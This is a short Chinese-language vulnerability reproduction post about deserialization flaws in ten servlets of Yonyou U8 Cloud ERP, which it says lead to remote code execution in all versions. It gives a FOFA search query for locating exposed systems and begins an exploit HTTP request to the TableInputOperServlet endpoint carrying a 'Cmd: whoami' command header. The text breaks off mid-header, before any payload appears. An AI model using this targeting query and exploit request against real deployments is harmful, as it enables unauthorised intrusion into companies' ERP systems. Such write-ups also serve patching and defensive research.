0x01 產品簡介

用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成長型、創新型企業，提供企業級云ERP整體解決方案。

0x02 漏洞概述

用友U8 Cloud存在多處（TableInputOperServlet、LoginServlet 、FileTransportServlet、CacheInvokeServlet、ActionHandlerServlet、ServletCommander、MxServlet 、MonitorServlet、LoggingConfigServlet、ClientRequestDispatch）反序列化漏洞，系統未將用戶傳入的序列化數據進行過濾就直接執行反序列化操作，結合系統本身存在的反序列化利用鏈，最終造成遠程代碼執行。

0x03 影響范圍

所有版本

0x04 復現環境

FOFA：app="用友-U8-Cloud"

0x05 漏洞復現

Exp-1(TableInputOperServlet)

POST /service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet HTTP/1.1
Host: your-ip
Cmd: whoami
Accep